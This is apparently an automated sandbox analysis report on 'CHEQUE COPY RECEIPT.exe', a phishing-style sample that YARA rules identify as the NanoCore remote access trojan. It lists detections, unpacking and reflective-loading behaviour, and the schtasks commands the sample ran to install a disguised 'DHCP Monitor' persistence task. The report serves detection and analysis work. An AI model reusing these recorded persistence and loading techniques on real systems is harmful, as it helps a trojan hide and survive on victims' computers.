Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.24fca54.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.24fca54.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5640000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5640000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@14/18@17/2

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403486
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		10_2_00403486

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404763

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_100041FD CreateToolhelp32Snapshot,Process32FirstW,

0_2_100041FD

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 1_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

1_2_00401489

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_01
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{bed38ea9-13ae-4999-bfd6-9ec5f9de3405}

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File created: C:\Users\user\AppData\Local\Temp\nsmD23E.tmp

Jump to behavior

Source: CHEQUE COPY RECEIPT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CHEQUE COPY RECEIPT.exe	Virustotal: Detection: 40%
Source: CHEQUE COPY RECEIPT.exe	ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File read: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'
Source: unknown	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknown	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0	Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CHEQUE COPY RECEIPT.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbneutral, PublicKeyToken=b77a5c561934e089" /> source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499581962.0000000000822000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: CHEQUE COPY RECEIPT.exe, 00000000.00000003.234086186.0000000002A80000.00000004.00000001.sdmp, CHEQUE COPY RECEIPT.exe, 00000009.00000003.252668286.0000000002C00000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: CHEQUE COPY RECEIPT.exe, 00000000.00000003.234086186.0000000002A80000.00000004.00000001.sdmp, CHEQUE COPY RECEIPT.exe, 00000009.00000003.252668286.0000000002C00000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Unpacked PE file: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Unpacked PE file: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack

.NET source code contains potential unpacker

Show sources

Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_73CA1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_73CA1A98

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_73CA2F60 push eax; ret	0_2_73CA2F8E
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00401F16 push ecx; ret	1_2_00401F29
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_05057648 push eax; iretd	1_2_05057649
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 9_2_73352F60 push eax; ret	9_2_73352F8E
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00401F16 push ecx; ret	12_2_00401F29
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_05067648 push eax; iretd	12_2_05067649

Source: initial sample	Static PE information: section name: .data entropy: 7.66089605527
Source: initial sample	Static PE information: section name: .data entropy: 7.66089605527

